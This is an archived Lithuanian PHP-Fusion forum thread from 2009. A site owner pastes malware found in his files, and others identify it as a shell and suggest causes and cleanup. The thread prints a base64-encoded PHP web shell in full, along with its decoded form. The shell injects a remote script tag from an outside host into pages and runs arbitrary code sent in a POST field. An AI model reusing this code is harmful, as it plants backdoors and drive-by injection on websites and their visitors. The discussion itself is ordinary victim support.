Pradinis
Pagalba
Užsisakyk!
- Reklamą
- Hostingą
- El. pašto dėžutę
Užsisakyk!
Įrankiai
Pasidalink
- Visos temos
REKLAMA
PHPFusion - tai laisvai platinama nemokama turinio valdymo sistema (TVS), kurios pagalba galite greitai, lengvai ir
patogiai susikurti norimą internetinį puslapį. Plačiau apie sistemą...
Prisijungti
Šaukykla
MaFetas
2024 Lap. 13 22:11:57
hey how, geras dar veikiantis saitas?
Jaunelis
2024 Lie. 25 11:07:43
Oho vis dar veikia svetainė
Šimtas metų, matau Šaukykloje nuostalgija. Smagu panaršyt po forumą ir pažiūrėt senas temas 
And2s
2024 Lie. 17 19:07:04
2008 pirmą kart čia patekau, man buvo 10m ir čia pramokau programavimo.. smagu skaityti senas žinutes, tokia nostalgija ačiū Ozz kad saugoji šitą kultūrinį reliktą
ozzWANTED
2024 Sau. 17 01:01:00
Desperatiškus komentarus šaukykloje su accountu po mėnesio prasibuvimo, ištryniau. Pasaulis ir taip juodas. Įjungiam šviesą, prašviesės.
Majakas
2023 Gru. 10 19:12:39
Negaliu patikėti jog žinutės/pranešimai visi yra nuo 2008 m
2024 Lap. 13 22:11:57
hey how, geras dar veikiantis saitas?
Jaunelis
2024 Lie. 25 11:07:43
Oho vis dar veikia svetainė
Šimtas metų, matau Šaukykloje nuostalgija. Smagu panaršyt po forumą ir pažiūrėt senas temas And2s
2024 Lie. 17 19:07:04
2008 pirmą kart čia patekau, man buvo 10m ir čia pramokau programavimo.. smagu skaityti senas žinutes, tokia nostalgija
ačiū Ozz kad saugoji šitą kultūrinį reliktą ozzWANTED
2024 Sau. 17 01:01:00
Desperatiškus komentarus šaukykloje su accountu po mėnesio prasibuvimo, ištryniau. Pasaulis ir taip juodas. Įjungiam šviesą, prašviesės.
Majakas
2023 Gru. 10 19:12:39
Negaliu patikėti jog žinutės/pranešimai visi yra nuo 2008 m
Apklausa
Reklama 400x60
Kas tai ?
| Forumas | PHP-Fusion, WordPress, Shopify, PHP ir MySQL (PROGRAMAVIMAS) | Expert PHP, MySQL klausimai |
| Autorius: Langas | Peržiūrų: 5825  |
|
Langas Narys Kapitonas  Pranešimai: 809 Įstojęs: 2007 Lie. 20 11:07:03 |
|
Sveiki, užtikau kad šendien jau nebeveikia mano tinklalapis ir daugelyje failų randu šį kodą :<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnZTc1ajAnKSl7ZnVuY3Rpb24gZTc1ajAoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMk5oYkdsaWNtRjBhVzl1TFhSbGMzUnBibWN0WlhGMWFYQnRaVzUwTG1OdkxuVnJMMDVsZDBsdFp5OXliMkp2ZEhNdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBlNzVqMDIoJGEsJGIsJGMsJGQpe2dsb2JhbCRlNzVqMDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGU3NWowMSkpY2FsbF91c2VyX2Z1bmMoJGU3NWowMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nZTc1ajAnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdlNzVqMCcpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRlNzVqMGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2U3NWowMicpKSE9J2U3NWowMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>Gal galite padėti? kaip sutvarkyti tinklalapį ir apsaugoti nuo to, kas tai ? Redagavo Langas 2009 Gru. 3 17:12:49 |
|
|
d0mce Narys Buldozeris  Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 |
|
| Sveikas, čia yra shell'as virusas. Oj turėsi darbelio panaikinti sakant bus sunku. Apsaugosi tik su kodu kaip kiti sako antivirusinė. Be to naikink tuos virusus ir CHMOD index.php į 455. http://mightmedia.lt Lietuvių sukurtas TVS. Redagavo d0mce 2009 Gru. 3 16:12:43 |
|
|
maxas66 Narys Buldozeris Pranešimai: 287 Įstojęs: 2009 Rugs. 8 21:09:44 |
|
va kasif(!function_exists('e75j0')){function e75j0($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2NhbGlicmF0aW9uLXRlc3RpbmctZXF1aXBtZW50LmNvLnVrL05ld0ltZy9yb2JvdHMucGhwID48L3NjcmlwdD4='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function e75j02($a,$b,$c,$d){global$e75j01;$s=array();if(function_exists($e75j01))call_user_func($e75j01,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='e75j0')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('e75j0');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$e75j0l=(($a=@set_error_handler('e75j02'))!='e75j02')?$a:0;eval(base64_decode($_POST['e']));ir dar viduje vienas kodas užkoduotas <script src=http://calibration-testing-equipment.co.uk/NewImg/robots.php ></script>Čia shellas įkištas kiek supratau, buvo kažkur forume jau tokia tema. Redagavo maxas66 2009 Gru. 3 16:12:44 |
|
|
Narys Tankas Pranešimai: 2100 Įstojęs: 2006 Rugp. 17 16:08:42 |
|
| Atsinaujink jeigu naudoji PHP-FUSION 6 juk didelė saugumo klaidą ištaisyta!!!!! |
|
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 |
|
| Nevo teisingas, taip tai buvo tema. MediaL šitas atvejis buvo, nu ką pasakysiu MediaL nebeturėjo jegu su juo kovoti manau tau irgi neatsiras. Visu pirma, galėjo įmesti shell'ą į tavo svetaine taip: Davei kažkam administracijos laipsnį, ir jis įdėjo shell'a arba jo slaptažodį žinojo. Gali būti variantas ir tavo atkodavo md5 koduotę, ir sužinojo tavo slaptažodį įstate į svetaine shellą. Arba dar viena išeitis, leidi prisegti failus. http://mightmedia.lt Lietuvių sukurtas TVS. |
|
|
Narys Tankas Pranešimai: 2100 Įstojęs: 2006 Rugp. 17 16:08:42 |
|
d0mce parašė: Nevo teisingas, taip tai buvo tema. MediaL šitas atvejis buvo, nu ką pasakysiu MediaL nebeturėjo jegu su juo kovoti manau tau irgi neatsiras. Visu pirma, galėjo įmesti shell'ą į tavo svetaine taip: Davei kažkam administracijos laipsnį, ir jis įdėjo shell'a arba jo slaptažodį žinojo. Gali būti variantas ir tavo atkodavo md5 koduotę, ir sužinojo tavo slaptažodį įstate į svetaine shellą. Arba dar viena išeitis, leidi prisegti failus. Šitie variantai galimi jeigu turi priejima prie administravimo, kitu atvėju ne. (Na bet galimas daiktas, kad slaptažodžiai buvo: sūrys, šūdas ir pan). |
|
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 |
|
Drageli, arba žino jo kas hasha, ir su juo sakau atkodavo md5 koduotę, įlindo į webą ir pradėjo žaisti. Langas visad kai dedi kam administracijos laipsnį neduok pridėtinių puslapių nuorodos uždrausk http://mightmedia.lt Lietuvių sukurtas TVS. |
|
|
Narys Tankas Pranešimai: 2100 Įstojęs: 2006 Rugp. 17 16:08:42 |
|
d0mce parašė: Drageli, arba žino jo kas hasha, ir su juo sakau atkodavo md5 koduotę, įlindo į webą ir pradėjo žaisti. Langas visad kai dedi kam administracijos laipsnį neduok pridėtinių puslapių nuorodos uždrausk Na tai sakau slaptažodis buvo labai easy, ir galėjo nebent atkodoti, nes jeigu aš duočiau viena iš savo hash'ų tu atkodinėtum dienas, naktis ir vistiek neatkodotum. |
|
|
Langas Narys Kapitonas Pranešimai: 809 Įstojęs: 2007 Lie. 20 11:07:03 |
|
Dragelis parašė: Atsinaujink jeigu naudoji PHP-FUSION 6 juk didelė saugumo klaidą ištaisyta!!!!! Atsinaujinau dar tą pačia dieną kai naujiena parašyta buvo, taip ir nesupratau tiksliai ką reikia daryti Bėje nebesvaik, administratorių nebėra, visus pašalinęs esu jau ~ savaitę + yra administracijos apsauga navigation.php ar koks ten faile, automatiškai užbanina. niekas nežino nei duomenų bazės nei ftp. Redagavo Langas 2009 Gru. 3 16:12:44 |
|
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 |
|
| gal pas tave buvo galima prisegt failus prie kokio forumo? http://mightmedia.lt Lietuvių sukurtas TVS. |
|
|
Langas Narys Kapitonas Pranešimai: 809 Įstojęs: 2007 Lie. 20 11:07:03 |
|
| Taip, tačiau ne php ir kitų panašio tipo |
|
|
d0mce Narys Buldozeris Pranešimai: 202 Įstojęs: 2009 Lap. 23 15:11:01 |
|
| tai šitą galima, apeiti, kad leistu php patalpinti. http://mightmedia.lt Lietuvių sukurtas TVS. |
|
|
Langas Narys Kapitonas Pranešimai: 809 Įstojęs: 2007 Lie. 20 11:07:03 |
|
| Gi nėra jokių patalpintu failų, jei nepastebėjai, temą sukūriau expert skiltyje, todėl prašyčiau tokiam botui kaip tu kuris rašo nesamones, tai yra atvėjus kurių negalėjo būti, tai nerašyk išvis. Dabar dar vienas klausimėlis, jeigu pakeisiu includes folderį ar svetainė vėl veiks ? jeigu veiks tai kaip išvengti to ateityje, nes pirmą kartą susiduriu su tokiu atvėju Redagavo Langas 2009 Gru. 3 16:12:38 |
|
|
TDKileris Narys Generolas  Pranešimai: 867 Įstojęs: 2008 Lap. 24 18:11:05 |
|
| Man taspats atvejis buvo,pakovojau savaicike,jau buvo pradinge vienu metu,bet veliau vel pradejo tas pats,sql irgi buvo uzkrestas,tai tiesiog ftp kopija pasidariau i savo kompa jei prireiktu kokiu failiuku. Ir kurk weba is naujo,tik pirma istrink absoliuciai visus senus failus,pakeisk visus paswordus. Tik pirma savo kompe turek kokia antivirusine ,kad netuciau vel nebutu to paties Rekomenduoju gix.lt hostinga Taip pat starhost.lt paslaugas www.surfcss.lt Jau greit |
|
|
Langas Narys Kapitonas Pranešimai: 809 Įstojęs: 2007 Lie. 20 11:07:03 |
|
| O dieve, kaip manai ant v7 eis uždėti v6 vartotojus, siuntinius forumo temas ir postus, komentarus ? |
|
|
TDKileris Narys Generolas Pranešimai: 867 Įstojęs: 2008 Lap. 24 18:11:05 |
|
| na net nzn,jau cia reiktu profu klausti nes as buvau v7 taj ir ka reikejo persikeliau i v7 Rekomenduoju gix.lt hostinga Taip pat starhost.lt paslaugas www.surfcss.lt Jau greit |
|
|
darKy VIP narys Terminatorius  Pranešimai: 1284 Įstojęs: 2008 Lap. 10 10:11:05 |
|
| per pma man rodos galima www.ls-planet.com |
| Peršokti į forumą: |
